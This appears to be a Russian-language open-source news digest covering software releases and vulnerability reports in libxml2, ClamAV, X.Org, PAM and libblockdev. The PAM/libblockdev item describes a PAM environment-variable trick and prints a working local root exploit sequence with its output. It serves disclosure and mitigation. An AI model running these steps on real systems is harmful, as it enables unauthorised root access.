Состоялась встреча Билла Гейтса, Дэйва Катлера и Линуса Торвальдса

Выпуск языка программирования Hare 0.25.2

Язык оптимизирован для решения низкоуровневых задач, таких как разработка операционных систем, компиляторов, сетевых приложений и системных утилит, для которых требуется достижение максимальной производительности и полный контроль над выполнением. В языке применяется ручное управление памятью и статическая система типов, при которой каждой переменной явно должен быть присвоен определённый тип.

Для выполнения приложения поставляется минимальный runtime, а для разработки распространяется стандартная библиотека функций, предоставляющая доступ к базовым интерфейсам операционной системы, а также предлагающая функции для работы с типовыми алгоритмами, протоколами и форматами, включая средства для использования регулярных выражений и шифрования. Для разработки графических приложений развивается инструментарий hare-wayland, а также привязки для доступа к возможностям GTK, Vulkan, OpenGL, SDL2 и libui.

В новой версии:

• Расширены возможности буферизированного ввода/вывода. В модуль "memio::" добавлен режим потоков "nonblocking". Предложены опции для настройки поведения при обработке конца файла в bufio::scanner и режимы управления потоками bufio::stream. Добавлены функции os::open_buffered и os::create_buffered.
• В утилите "haredoc" реализована возможность извлечения из README-файлов краткого описания модулей и его отображения при выводе списка модулей.
• Реализована поддержка Unix/POSIX API: io::fsync, io::fdatasync, unix::getrlimit, unix::setrlimit и fcntl (через os::getflags и os::setflags). Для ОС NetBSD портирована поддержка разделяемой памяти.
• В утилиту hare добавлена поддержка встраивания внешних обработчиков, вызываемых при помощи подкоманды "hare tool". Например, при помощи подобного обработчика обеспечена интеграция с инструментом "hare-update".
• В разряд обязательных переведена обработка ошибок в ситуациях нехватки памяти. Добавлен новый примитивный тип "nomem", возвращаемый функциями выделения памяти при невозможности выделить требуемый объём памяти.
• Улучшен API для работы с датами и временем. Расширены возможности работы с часовыми поясами и добавлена поддержка правил PETZ (POSIX Extending TZ). Многие функции перенесены из модуля time::chrono в time::date.
• Добавлена поддержка семантических аннотаций кода, позволяющий прикрепить к коду дополнительные метаданные, которые игнорируются компилятором, но могут учитываться лексическим анализатором в стандартной библиотеке.

     #[json::gen]
     export type player = struct {
  	name: str,
  	#[json::field(name = "X", omit_null=true)]
  	x: *f64,
  	#[json::field(name = "Y", omit_null=true)]
  	y: *f64,
     };
  

• Добавлена утилита hare-update для упрощения миграции кода на новые версии инструментария Hare, содержащие изменения, нарушающие обратную совместимость. Например, утилита может использоваться для адаптации существующего кода к применению обязательной обработки ошибок выделения памяти, появившейся в текущем выпуске.

Планы KDE по прекращению поддержки сеанса X11

Время прекращения поддержки сеанса X11 зависит от того, как быстро разработчики смогут решить проблемы, специфичные для сеанса на базе Wayland, такие как ограничения в сохранении и восстановлении позиции окон Wayland-приложений, недоработки в поддержке графических планшетов, невозможность использования глобального меню в приложениях, не на базе Qt. Предполагается, что ко времени прекращения поддержки сеанса X11, сеанс Walyand будет содержать все ранее доступные возможности и даже самые требовательные пользователи X11 не должны заметить потери функциональности.

В настоящее время сеанс X11 продолжает сопровождаться. Сопровождение подразумевает тестирование компиляции компонентов KDE с поддержкой X11 и исправление специфичных для X11 важных ошибок и регрессий. Устранение некритичных ошибок и реализация новой функциональности, связанной с X11, будет производиться только если появится спонсор, готовый оплатить эту работу. При этом ситуация не так плоха, как может показаться - большинство исправляемых проблем и развиваемых новых функций не привязаны к какой-то платформе - лишь 0.76% открытых отчётов об ошибках связаны с X11.

Среди причин грядущего прекращения поддержки X11 упоминается общая стагнация разработки X-сервера и желание не распылять ограниченные ресурсы разработчиков на параллельную поддержку двух дисплейных систем и типов сеансов. X11 устарел и Wayland лучше подходит для современного оборудования. В частности, в текущем виде X11 не может удовлетворить современные потребности, касающиеся многомониторных конфигураций, экранов с высокой плотностью пикселей, HDR, VRR (адаптивное изменение частоты обновления монитора), одновременной работы с несколькими GPU, устойчивости к сбоям, обработки ввода и обеспечения безопасности.

По имеющейся статистике 73% пользователей KDE Plasma 6 и 60% всех пользователей KDE (включая KDE 5), активировавших отправку телеметрии, применяют сеанс на базе Walyand. Интересно, что по статистике, полученной месяц назад, 82% пользователей KDE Plasma 6 применяли Walyand, т.е. доля пользователей Wayland за месяц уменьшилась до 73%. Подобный спад объясняется выходом платформы SteamOS 3.7, в которой осуществлён переход на KDE Plasma 6 с сеансом X11 по умолчанию. Wayland-сеанс на базе KDE по умолчанию предлагают дистрибутивы Arch, Fedora, KDE neon и Kubuntu.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63439

Релиз XLibre 25.0, форка X.Org Server

Форк создал Энрико Вайгельт (Enrico Weigelt), занимающий первое место по числу подготовленных для X-сервера изменений - до создания форка от Энрико в X.Org Server было принято около 1600 изменений и ещё более 1200 изменений включено в кодовую базу форка. Энрико также является мэйнтейнером драйверов AMD FCH GPIO и VIRTIO GPIO в ядре Linux, и мэйнтейнером Xnest. Энрико приглашает присоединиться к работе над XLibre всех желающих, готовых внести свой вклад в разработку и заинтересованных в продвижении X11, независимо от страны, расы, пола, возраста, политических убеждений и личных особенностей. С момента основания форка к разработке уже подключилось более 10 участников, предоставивших несколько десятков изменений.

Причиной создания форка стало несогласие с политикой сопровождающих X.Org, ведущей к стагнации разработки, в то время как Энрико выступал за активное продолжение развития и проведения большой чистки X-сервера. Недовольство сопровождающих в отношении Энрико, которое привело к прекращению приёма от него изменений, вызвано тем, что некоторые связанные с проведением чистки изменения приводили к проблемам, регрессиям, нарушению ABI и сбоям при сборке. Кроме того, Энрико был склонен к теориям заговора и заявлял, что компания Red Hat намеренно тормозит развитие X-сервера.

В первом выпуске XLibre, помимо значительной чистки кода и избавления проекта от технического долга (более тысячи патчей), предложены следующие новшества:

• Поддержка X11-расширения Xnamespace, обеспечивающего изоляцию клиентов через разделение на уровне пространств имён X11.
• Перевод Xnest на XCB и исключение Xlib из зависимостей.
• Возможность одновременной установки разных версий ABI (для каждого варианта API свой каталог с драйверами) для бесшовного обновления в дистрибутивах.
• Улучшение поддержки платформ, отличных от Linux.
• Устранение накопившихся уязвимостей.

Сопровождающий libxml2 отказался от особого отношения к устранению уязвимостей

В описание проекта libxml2 добавлено примечание, указывающее на то, что библиотека написана энтузиастами, сопровождается одним добровольцем, плохо протестирована, написана на языке небезопасно работающем с памятью, содержит множество уязвимостей и не рекомендована для обработки не заслуживающих доверия данных. Сообщения о проблемах с безопасностью предписано отправлять через штатную публичную систему отслеживания ошибок и они будут обрабатываться как любые другие ошибки. За закрытыми дверями уязвимости больше устраняться не будут и все имеющиеся сведения о проблемах с безопасностью сразу будут публиковаться в открытом доступе, независимо от требований по неразглашению до заданной даты и без откладывания раскрытия информации до релиза.

Предполагается, что переход к обработке уязвимостей как обычных ошибок даст возможность Нику сосредоточиться на основной работе над libxml2, не прерываясь на внеплановые задачи. В текущем виде Нику приходится тратить несколько часов в неделю на обработку сообщений об уязвимостях и подготовку патчей, что создаёт достаточно большую нагрузку с учётом того, что сопровождение осуществляется на голом энтузиазме.

Отмечается, что скрытие сведений об уязвимостях до публикации обновлений и метрики типа OpenSSF Scorecard лишь попытка крупных компаний вызвать у сопровождающих чувство вины и заставить работать бесплатно. Предъявление дополнительных требований к сопровождающим-волонтёрам, работающим без компенсации, названо пагубной практикой.

По словам Ника, библиотека libxml2 не обладает уровнем качества, пригодным для использования в браузерах и операционных системах. Тем не менее, крупные компании, такие как Apple, Google и Microsoft, стали использовать libxml2 в своих операционных системах и продуктах. Подобные действия названы безответственными, а проводимая работа - попытками избавиться от симптомов, а не устранить причину проблем. По мнению Ника для проекта было бы лучше, если упомянутые компании прекратили использование libxml2.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63437

Обновление WSL 2.6.0, прослойки для запуска Linux в Windows

WSL предоставляет виртуальную машину с полноценным ядром Linux (на базе ветки 6.6), в которой могут запускаться дистрибутивы Linux. Ядро включает специфичные для WSL изменения, такие как оптимизации для сокращения времени запуска и уменьшения потребления памяти, возможность возвращения Windows освобождённой Linux-процессами памяти и настройки для исключения лишних драйверов и подсистем. Система устанавливается в отдельный дисковый образ (VHD) c файловой системой ext4 и виртуальным сетевым адаптером.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63435

Прогресс в разработке мобильной платформы KDE Plasma Mobile

Поддержка телефонии в Plasma Mobile базируется на телефонном стеке ModemManager и коммуникационном фреймворке Telepathy. Для вывода графики используется композитный сервер kwin_wayland, а для обработки звука применяется PulseAudio. Мобильные версии приложений развиваются в основном составе KDE Gear. Для построения интерфейса приложений задействован набор компонентов Mauikit и фреймворк Kirigami из состава KDE Frameworks, позволяющий создавать универсальные интерфейсы, пригодные для смартфонов, планшетов и ПК.

В состав входят такие приложения, как KDE Connect для сопряжения телефона с рабочим столом, просмотрщик документов Okular, музыкальный проигрыватель VVave, просмотрщики изображений Koko и Pix, система ведения заметок buho, календарь-планировщик calindori, файловый менеджер Index, менеджер приложений Discover, программа для отправки SMS Spacebar, адресная книга plasma-phonebook, интерфейс для осуществления телефонных вызовов plasma-dialer, браузер plasma-angelfish и мессенджер Spectral.

Среди наиболее заметных изменений:

• В предлагаемом по умолчанию домашнем экране Folio реализована панель поиска по списку приложений; добавлена поддержка управления через тачпад; появилась опция для блокировки редактирования раскладки элементов на экране; реализована кнопка для открытия окна со всеми настройками обоев; добавлен диалог подтверждения удаления папок; обеспечен тактильный отклик для различных действий.
• В выпадающей панели с кнопками быстрого вызова и уведомлениями (Action Drawer) реализована анимация при попытке прокрутки за конец списка ("overscroll"). Обеспечена возможность вывода панели во время работы в полноэкранных приложениях. Добавлена отдельная область для кнопок быстрого вызова действий. Предоставлена возможность настройки порядка вывода кнопок. Обеспечено автоматическое скрытие неприменимых кнопок (например, кнопка активации мобильной передачи данных теперь не показывается при отсутствии модема). Реализовано скрытие панели при изменении состояния ползунка изменении яркости экрана. Добавлены кнопки для открытия всех приложений в полноэкранном режиме и записи скринкаста. Добавлена поддержка раскрытия виджета управления воспроизведением музыки при нажатии на нём.
• Интерфейс переключения задач переведён на API управления жестами, предоставляемый композитным менеджером KWin. Добавлены новые управляющие жесты, такие как сдвиг снизу-вверх для минимизации приложения и перехода на домашний экран, сдвиг снизу-вверх с удержанием касания для показа списка задач, сдвиг влево или вправо в нижней части экрана для прокручивания списка запущенных приложений. Добавлена поддержка тактильной индикации жестов. Улучшена анимация при переключении задач. Реализована сортировка задач по времени их последней активности. Добавлена поддержка быстрого переключения между двумя недавними задачами двойным касанием к кнопке переключения задач.
• В экране блокировки системы переработано оформление панели для ввода цифрового PIN-кода, которую стало удобнее использовать при работе с устройством одной рукой. Улучшено оформление виджета с часами, который стал крупнее и лучше сочетается с фоновым изображением. Добавлены кнопки для быстрого выполнения действий при заблокированном экране, таких как включение фонарика.
• Реализованы полноценные всплывающие уведомления. Добавлена поддержка группировки нескольких уведомлений в стеки. Решены многие проблемы в виджете для показа уведомлений.
• Предоставлена возможность изменения в настройках высоты строки состояния. В полноэкранных приложениях для показа строки состояния теперь можно использовать жест сдвига содержимого вниз. Добавлены настройки для показа процента заряда аккумулятора и отображения даты в дополнение ко времени.
• Переделана всплывающая панель изменения громкости, которая при активации теперь не перехватывает у приложения события ввода вне своей области.
• В панель навигации добавлена кнопка для ручного поворота экрана (поворачивает экран в зависимости от текущей ориентации устройства, когда автоматический поворот отключён в настройках). При скрытии панели навигации кнопка показывается поверх содержимого.
• Переделана анимированная индикация запуска приложений ("startup feedback"), которая теперь показывается и в интерфейсе переключения задач. При длительном запуске приложения обеспечен показ спинера.
• Настройки в конфигураторе разделены на отдельные категории. Добавлен переключатель для показа всех доступных настроек, даже предоставляемых не для мобильных устройств. В настройках Wi-Fi реализован мониторинг трафика текущего соединения. В секцию с информации о системе добавлены сведения о производителе.
• В web-браузере Angelfish значительно переделаны список вкладок и панель поиска. Для показа и скрытия списка вкладок теперь можно использовать жест сдвига панели поиска вверх. Сам список вкладок теперь показывается в форме полноэкранной сетки. При прокрутке списка найденных элементов обеспечен предпросмотр URL.
• В интерфейсе набора номера и приёма звонков (Dialer) решены проблемы с выводом при блокировке экрана и принятии звонка на устройствах с несколькими SIM-картами.
• В программе для работы с SMS-сообщениями (Spacebar) решены проблемы с приёмом и отправкой сообщений, а также выводом уведомлений при поступлении сообщений. Переработано оформление страницы создания нового чата.
• В менеджер установки приложений (Discover) интегрирован бэкенд для формата пакетов apk, используемых в дистрибутивах Alpine и postmarketOS.
• В эмуляторе терминала QMLKonsole разрешено вручную включать или скрывать панель для симуляции нажатия клавиш-модификаторов. Решены проблемы с показом экранной клавиатуры при попытке ввода в терминале.
• Модернизировано приложение для работы с часами, будильником и таймером. Реализован постоянный показ уведомления при активном таймере. Добавлена возможность изменения значения таймера без его повторного создания, а также приостановки и сброса таймера из KRunner. Добавлен вариант интерфейса с аналоговыми часами.

Выпуск MODICIA 6.12.30, дистрибутива для создателей мультимедийного контента

Среди особенностей MODICIA:

• Включён по умолчанию режим высокой производительности CPU (Turbo Boost).
• Снижена активность использования раздела подкачки (параметр ядра vm.swappiness уменьшен с 60 до 10).
• Задействован Zram для сжатия данных, хранимых в оперативной памяти (RAM-диск со сжатием).
• Доступен для установки вариант ядра, работающий в режиме реального времени.
• Задействован Wine для запуска мультимедийных программ, собранных для Windows.

Выпуск игрового движка Open 3D Engine 25.05, открытого компанией Amazon

Исходный код движка O3DE был открыт в июле 2021 года компанией Amazon и основаны на коде ранее развиваемого проприетарного движка Amazon Lumberyard, построенного на технологиях движка CryEngine, лицензированных у компании Crytek в 2015 году. После открытия кодовой базы развитие движка курирует некоммерческая организация Open 3D Foundation, созданная под эгидой Linux Foundation. Помимо Amazon к совместной работе над проектом подключились такие компании, как Epic Games, Adobe, Huawei, Microsoft, Intel и Niantic.

Движок включает в себя интегрированную среду для разработки игр, многопоточную систему фотореалистичного рендеринга Atom Renderer с поддержкой Vulkan, Metal и DirectX 12, расширяемый редактор 3D-моделей, систему анимирования персонажей (Emotion FX), систему разработки полуфабрикатов (prefab), движок симуляции физических процессов в реальном режиме времени и математические библиотеки, использующие инструкции SIMD. Для определения игровой логики может использоваться среда визуального программирования (Script Canvas), а также языки Lua и Python.

Проект изначально рассчитан на возможность адаптации под свои нужды и имеет модульную архитектуру. Всего предлагается более 30 модулей, поставляемых в виде отдельных библиотек, пригодных для замены, интеграции в сторонние проекты и использования по отдельности. Например, благодаря модульности разработчики могут заменить рендер графики, звуковую систему, поддержку языков, сетевой стек, физический движок и любые другие компоненты.

Среди изменений в новой версии:

• Полностью переделан инструмент Trackview, применяемый для создания интерактивной анимации в играх.
• Проведена работа по повышению производительности движка рендеринга Atom и реализации в нём возможности работы одновременно с несколькими GPU.
• Реализована поддержка нового стандартизированного интерфейса симуляции в модуле ROS2, интегрируемом с инструментарием Robot Operating System (ROS2) и предоставляющем драйверы, реализации алгоритмов, компоненты, ресурсы и утилиты для создания симуляторов роботов.
• Компании Open Robotics, NVIDIA и Robotec.ai совместно модернизировали возможности платформы для построения сложных симуляторов.
• Компания Meta упростила интеграцию инструментария Quest Mobile SDK (Oculus Mobile SDK) с движком O3DE - автоматизированы операции настройки окружения для систем виртуальной реальности и управления пакетами с использованием O3DE.
• Упрощён процесс подготовки и передачи изменений в проект. Для документации к API задействована система модулей Hugo, благодаря которой разработчики теперь могут отправлять изменения к документации в форме небольших pull-запросов.
• Повышено качество работы среды визуального программирования Script Canvas.
• Добавлена поддержка свежих версий Android SDK и Gradle.
• Сокращено время загрузки и повышена производительность приложений для платформы Android.
• Проведена оптимизация производительности компонентов движка для разработки игр для мобильных платформ. В некоторых ситуациях, например, при использовании констант шейдеров, удалось добиться прироста производительности на 40%.
• Стабилизирована возможность задействования нескольких разных GPU для отрисовки одной сцены.
• Зависимости обновлены для поддержки последней версии спецификации OpenXR.

Уязвимости в библиотеке libxml2, приводящие к выполнению кода

Уязвимость CVE-2025-6170 вызвана переполнением буфера в реализации интерактивной оболочки xmllint, применяемой для разбора XML-файлов. Переполнение возникает при обработке очень длинных аргументов команд из-за отсутствия корректной проверки размера входных данных перед копированием данных функцией strcpy(). Для эксплуатации уязвимости атакующий должен иметь возможность влиять на команды, передаваемые в утилиту xmllint. Патч для устранения уязвимости пока недоступен.

Вторая потенциально опасная уязвимость CVE-2025-6021 присутствует в реализации функции xmlBuildQName() и приводит к записи данных за пределы буфера из-за целочисленного переполнения при вычислении размера буфера на основе префикса и локального имени. Для устранения уязвимости подготовлен патч. Исправление включено в состав выпуска libxml2 2.14.4. Проверить состояние новой версии пакета или подготовки исправления в дистрибутивах можно на следующих страницах (если страница недоступна, значит разработчики дистрибутива ещё не приступили к рассмотрению проблемы): Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Gentoo и Arch (1, 2).

Остальные три проблемы приводят к аварийному завершению из-за обращения к уже освобождённой области памяти в функции xmlSchematronGetNode (CVE-2025-49794), разыменования нулевого указателя в функции xmlXPathCompiledEval (CVE-2025-49795) и неправильной обработки типов (Type Confusion) в функции xmlSchematronFormatReport (CVE-2025-49796). Для устранения данных уязвимостей рассматривается возможность удаления из libxml2 поддержки языка разметки Schematron.

Дополнительно отмечается наличие трёх неисправленных уязвимостей в библиотеке libxslt, оставшейся без активного сопровождающего. Информация по данным проблемам пока не раскрывается и запланирована к публикации 9 июля, 13 июля и 6 августа. Неисправленные и публично не обнародованные уязвимости также отмечаются в связанных с GNOME проектах gvfs, libgxps, gdm, glib, GIMP и libsoup.

Источник: https://www.opennet.ru/opennews/art.shtml?num=63431

Обновление антивирусного пакета ClamAV 1.4.3 и 1.0.9 с устранением уязвимостей

• CVE-2025-20260 - ошибка в коде разбора файлов в формате PDF, приводящая к записи данных за пределы выделенного буфера. Проблема проявляется в конфигурациях, максимальный размер настроек file-size и scan-size в которых равен или превышает 1024MB и 1025MB соответственно. Эксплуатация уязвимости возможна начиная с выпуска 1.0.0 и может привести к выполнению кода с правами процесса ClamAV.
• CVE-2025-20234 - ошибка в коде разбора файлов в формате UDF, приводящая к чтению данных из области памяти за пределами выделенного буфера. Проблема может привести к аварийному завершению процесса или утечки данных из памяти во временный файл. Уязвимость проявляется начиная с версии 1.2.0.
• Обращение к памяти после её освобождения в модуле распаковки архивов в формате xz (CVE не назначен). Проблема вызвана ошибкой во встроенной в код ClamAV библиотеке lzma-sdk, которая была устранена в основном проекте в выпуске lzma-sdk 18.03, опубликованном 2018 в году без упоминания устранения уязвимости. Уязвимость проявляется во всех версиях ClamAV, начиная с 0.99.4.
  
  Источник: https://www.opennet.ru/opennews/art.shtml?num=63430

Опубликован офисный пакет ONLYOFFICE 9.0

В ONLYOFFICE заявлена полная совместимость с форматами MS Office и OpenDocument. Среди поддерживаемых форматов: DOC, DOCX, ODT, RTF, TXT, PDF, HTML, EPUB, XPS, DjVu, XLS, XLSX, ODS, CSV, PPT, PPTX, ODP. Предусмотрена возможность расширения функциональности редакторов через плагины, например, доступны плагины для создания шаблонов и добавления видео с YouTube. Отдельно развивается открытый продукт ONLYOFFICE DesktopEditors, построенный на единой кодовой базе с online-редакторами и объединяющий в одном наборе клиентские и серверные компоненты, оформленные для самодостаточного использования на локальной системе пользователя и способные работать без обращения к внешнему сервису.

Основные новшества:

• Обновлён интерфейс пользователя в редакторах документов, электронных таблиц, презентаций и PDF-файлов. Добавлены новые темы оформления Modern Light и Modern Dark.
• Добавлен отдельный интерфейс для просмотра диаграмм (Diagram Viewer), позволяющий напрямую открывать файлы с диаграммами без вызова сторонних приложений.
• Расширены возможности встроенного AI-ассистента. Добавлена поддержка оптического распознавания текста на изображениях в PDF-документах, позволяющая копировать текст из PDF-файлов c отсканированными страницами.
• Добавлены AI-инструменты для автоматизации работы с электронными таблицами, позволяющие использовать запрос на естественном языке для выполнения действий с данными, например, можно попросить сформировать формулы для сложного набора данных.
• Предоставлена возможность использования AI для автоматизации повторяющихся действий и создания макросов на основе описания задачи на естественном языке. Добавлен AI-конвертер из VBA в JavaScript.
• В редактор PDF-файлов добавлена поддержка совместного заполнения или создания форм ввода, позволяющая одновременно нескольким участникам работать над одной формой. Предоставлена возможность перегруппировки страниц в режиме Drag & Drop, перетаскивая мышью эскизы страниц в навигационной панели. Реализована поддержка использования комбинаций клавиш Ctrl + C и Ctrl + V для копирования и вставки страниц через буфер обмена.
• В редакторе документов в панели инструментов реализована новая кнопка для быстрой настройки обрамления содержимого.
• Добавлена возможность добавления собственных кнопок управления контентом, функциональность которых обеспечивается плагинами. Улучшена визуализация при отслеживании изменений.
• В редакторе электронных таблиц предоставлена возможность прямой подстановки данных из внешних электронных таблиц.
• Добавлена поддержка асинхронных вычислений с возможностью создания маросов, содержащих функции-обработчики запросов.
• В редакторе презентаций в режиме слайдшоу реализована возможность показа расширенной анимации в слайдах.
• Улучшена визуализация данных и расширены возможности для настройки диаграмм. Добавлена поддержка графиков роста/спада. Предоставлена возможность использования элементов форматирования TextArt в метках диаграмм.
• Добавлена поддержка чтения данных в форматах md (Markdown), odg (OpenDocument Graphic), vsdx (Visio) и xlsb.
• В интерфейсе проверки правописания реализовано сохранение последнего выбранного языка.

Релиз среды разработки Qt Creator 17

Краткий список улучшений и исправлений:

• Тёмная и светлая темы "2024", добавленные в Qt Creator 15 и обновлённые в Qt Creator 16, теперь используются по умолчанию. Пересмотрены и обновлены иконки Qt Creator для соответствия новому внешнему виду и достижения большей целостности интерфейса.
• Репозиторий плагинов, используемый по умолчанию, перенесён на GitHub. Дополнительные репозитории плагинов теперь могут быть добавлены в "Preferences > Extensions > Browser" (использовать на свой страх и риск). Расширена отображаемая информация для ещё не установленных плагинов. Добавлена установка плагинов с помощью перетаскивания (drag-n-drop) архива на панель плагинов.
• Проекты: Профили запуска сделаны частью сборочных профилей (ранее были полностью независимы). Теперь каждый профиль запуска принадлежит определённому профилю сборки, и переключение текущего профиля сборки также переключает набор доступных профилей запуска, что реализует часто запрашиваемый пользователями сценарий: возможность использования разных параметров запуска, таких как аргументы командной строки или переменные окружения, для разных сборочных профилей, таких как Debug и Release.

  Значения одних профилей запуска теперь можно копировать в другие с помощью кнопки "Copy into This" вне зависимости от принадлежности к конкретному сборочному профилю.

• CMake: Добавлена возможность установки недостающих компонентов Qt с помощью Qt Online Installer (если Qt Creator с ним слинкован) в случае неудавшегося вызова cmake, вызванного недостающими компонентами Qt. Новое поведение полагается на функциональность "Preferences > CMake > General > Package manager auto setup", требующую запуска CMake из Qt Creator.
• Python: Добавлена поддержка открытия проектов pyproject.toml; они же теперь создаются по умолчанию для новых PySide-проектов, созданных с помощью wizard-ов в Qt Creator. Открытие проектов .pyproject всё ещё поддерживается.
• Редактирование C++: Готовые исполняемые файлы теперь собираются с помощью LLVM 20.1.3 для обновлённой поддержки C++. Исправлена поддержка операторов строковых литералов Qt (например, "_ba" и "_L1"). Исправлены некоторые проблемы со встроенными функциями и макросами, используемыми подобно функциям.

  Добавлены изменения, призванные упростить жизнь разработчиков при использовании классов Qt, не используемых ранее в проекте (не найденных Code Model): новый quick fix (жёлтая лампочка в редакторе на строке с новым для проекта классом Qt) позволяет добавить недостающие директивы #include в исходники и недостающие модули Qt в файл проекта. Такой же quick fix на строках с директивами #include позволяет добавить необходимые модули Qt в файл проекта.

• QML: Опции стиля кода в "Preferences > Qt Quick > Code Style" теперь позволяют использовать интегрированный в "QML language server" qmlformat, равно как встроенный форматировщик (formatter) или пользовательский форматировщик, совместимый с qmlformat. Переформатирование документа теперь доступно в контекстном меню и в меню "Tools > QML/JS".

  В панель инструментов редактора кода QML добавлена новая кнопка для открытия файлов .ui.qml в Qt Design Studio.

• Analyzer: Для Axivion добавлена поддержка локальных информационных панелей (dashboard) с новыми кнопками "Local Build" и "Local Dashboard" в интерфейсе Issues в режиме Debug > Axivion. Добавлены различные настройки в "Preferences > Analyze > Axivion".
• Управление версиями: Для git добавлены различные действия "diff", работающие со "staged" изменениями вместо "unstaged". В подсказки для Instant Blame добавлены действия для отката изменений. В диалоге "Add Tag" теперь можно создавать аннотированные теги.

Уязвимости в PAM и libblockdev, позволяющие получить права root в системе

Процесс udisks применяется практически во всех дистрибутивах Linux и предоставляет интерфейс D-Bus для выполнения операций с накопителями, таких как монтирование и форматирование. Для совершения действий с накопителями udisks вызывает функции библиотеки libblockdev. Доступ к udisks по умолчанию открыт только для пользователей, работающих в контексте "allow_active", т.е. имеющих физический доступ к компьютеру и подключившихся через локальную консоль или запустивших графический сеанс. Пользователи, подключающиеся удалённо, например, по ssh, не попадают в этот контекст и напрямую не могут эксплуатировать уязвимость.

Для обхода данного ограничения можно использовать трюк, позволяющий поднять уровень аутентификации до "allow_active" через манипуляции с запуском утилитой systemctl пользовательского сервиса, который polkitd воспримет как признак локального сеанса. Суть метода в том, что polkitd определяет наличие физического доступа и присваивает уровень "allow_active" на основе косвенных признаков, на которые можно повлиять. Ограничения метода в том, что для обмана polkitd требуется, чтобы в системе уже был активен сеанс локального пользователя с физическим доступом.

Вторым методом получения прав "allow_active" является эксплуатация уязвимости (CVE-2025-6018) в PAM (Pluggable Authentication Modules), которую исследователи из Qualys выявили в ходе анализа уязвимости в libblockdev. Уязвимость позволяет любому пользователю, в том числе подключившемуся по SSH, выполнять операции в контексте "allow_active". Проблема специфична для настроек PAM в openSUSE Leap 15 и SUSE Linux Enterprise 15, и проявляется только в этих дистрибутивах.

В модуле pam_env в openSUSE и SUSE по умолчанию включено чтение файла ~/.pam_environment. Через данный файл пользователь может выставить переменные окружения XDG_SEAT=seat0 и XDG_VTNR=1, которые при дальнейшей обработке будут восприняты как признак физического присутствия пользователя, даже если фактически вход осуществлён по SSH. Модуль pam_env также вызывается при подключении по ssh в Debian 12 и Ubuntu 24.04 (в Debian 13 и Ubuntu 24.10+ он отключён), но выставление переменных окружения в данных дистрибутивах не может применяться для повышения уровня доступа до "allow_active", так как pam_env вызывается на финальном этапе после загрузки модуля pam_systemd и выставленные переменные окружения не могут повлиять на параметры сеанса.

Что касается уязвимости в libblockdev, то атакующий может примонтировать образ произвольной файловой системы в loop-режиме, разместив в этом образе исполняемый файл с флагом SUID root или специальное устройство (/dev/mem) для низкоуровневого доступа к дискам или памяти. Для блокирования подобных атак образы ФС монтируются системой с флагами nosuid и nodev, но уязвимость в libblockdev даёт возможность примонтировать образ без флагов nosuid и nodev. Суть уязвимости в том, что udisks позволяет пользователю с уровнем доступа "allow_active" менять размер своих файловых систем и libblockdev в процессе выполнения данной операции временно монтирует ФС без выставления флагов nosuid и nodev.

Таким образом атака сводится к созданию loop-устройства на базе образа ФС XFS, в котором размещён suid root файл, инициирования операции изменения размера loop-устройства и отслеживанию момента его монтирования в каталог /tmp/blockdev*:

   victim> killall -KILL gvfs-udisks2-volume-monitor

   victim> udisksctl loop-setup --file ./xfs.image --no-user-interaction
   Mapped file ./xfs.image as /dev/loop0.

   victim> while true; do /tmp/blockdev*/bash -c 'sleep 10; ls -l /tmp/blockdev*/bash' && break; done 2>/dev/null &

   victim> gdbus call --system --dest org.freedesktop.UDisks2 --object-path /org/freedesktop/UDisks2/block_devices/loop0 --method org.freedesktop.UDisks2.Filesystem.Resize 0 '{}'

   Error: GDBus.Error:org.freedesktop.UDisks2.Error.Failed: Error resizing filesystem on /dev/loop0: Failed to unmount '/dev/loop0' after resizing it: target is busy

   -r-sr-xr-x. 1 root root 1406608 Jun 18 09:42 /tmp/blockdev.RSM429/bash

   victim> /tmp/blockdev*/bash -p

   victim# id

   uid=65534(nobody) gid=65534(nobody) euid=0(root) groups=65534(nobody)
                       

Уязвимость в libblockdev пока устранена только в виде патчей. Проверить состояние новой версии пакета или подготовки исправления в дистрибутивах можно на следующих страницах (если страница недоступна, значит разработчики дистрибутива ещё не приступили к рассмотрению проблемы): Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Gentoo и Arch (1, 2). В качестве обходных путей для блокирования уязвимости можно изменить правило доступа к операции "org.freedesktop.udisks2.modify-device" в polkit, изменив в файле /usr/share/polkit-1/actions/org.freedesktop.UDisks2.policy значение параметра "allow_active" с "yes" на "auth_admin".

Дополнительно можно отметить раскрытую несколько часов назад уязвимость (CVE-2025-6020) в пакете linux-pam, позволяющую локальному пользователю получить права root. Модуль pam_namespace должным образом не проверял файловые пути, подконтрольные пользователю, что позволяло через манипуляции с символическими ссылками и достижением состояния гонки добиться перезаписи привилегированных файлов в системе. Уязвимость устранена в выпуске linux-pam 1.7.1. Проверить состояние новой версии пакета или подготовки исправления в дистрибутивах можно на следующих страницах: Debian, Ubuntu, Fedora, SUSE/openSUSE, RHEL, Gentoo и Arch (1, 2).

Источник: https://www.opennet.ru/opennews/art.shtml?num=63424

Обновление X.Org Server 21.1.17 с устранением 6 уязвимостей

Выявленные уязвимости:

• CVE-2025-49176 - целочисленное переполнение в реализации расширения Big Requests, позволяющего отправлять запросы, размером более 16 бит. Уязвимость проявляется с выпуска X11R6.0 (1994 год).
• CVE-2025-49179 - целочисленное переполнение в реализации расширения X Record, возникающее при отправке слишком больших значений числа клиентов или диапазонов. Уязвимость проявляется с выпуска X11R6.1 (1996 год).
• CVE-2025-49180 - целочисленное переполнение в реализации расширения RandR. Уязвимость проявляется с выпуска 1.13 RC1 (2012 год).
• CVE-2025-49178 - возможность создания ситуации, приводящей к блокированию запросов других клиентов. Уязвимость проявляется с выпуска Xorg 1.10.0
• CVE-2025-49175 - чтение из памяти вне границы буфера в расширении X Rendering, возникающее при выполнении операций с анимированными курсорами. Уязвимость проявляется с выпуска XFree86 4.3.0 (2003 год).
• CVE-2025-49177 - утечка данных в реализации расширения XFIXES, вызванная отсутствием проверки размера запроса клиента в обработчике XFixesSetClientDisconnectMode (клиент может отправить более короткий запрос и прочитать данные предыдущего запроса. Уязвимость проявляется с выпуска Xorg Server 21.1 RC1 (2011 год).

Релиз среды рабочего стола KDE Plasma 6.4

Основные изменения:

• Добавлена поддержка использования для каждого виртуального рабочего стола своей мозаичной раскладки окон.
  
  
• Тема оформления Breeze Dark сделана темнее для более контрастного отображения текста и элементов переднего плана на тёмном фоне.
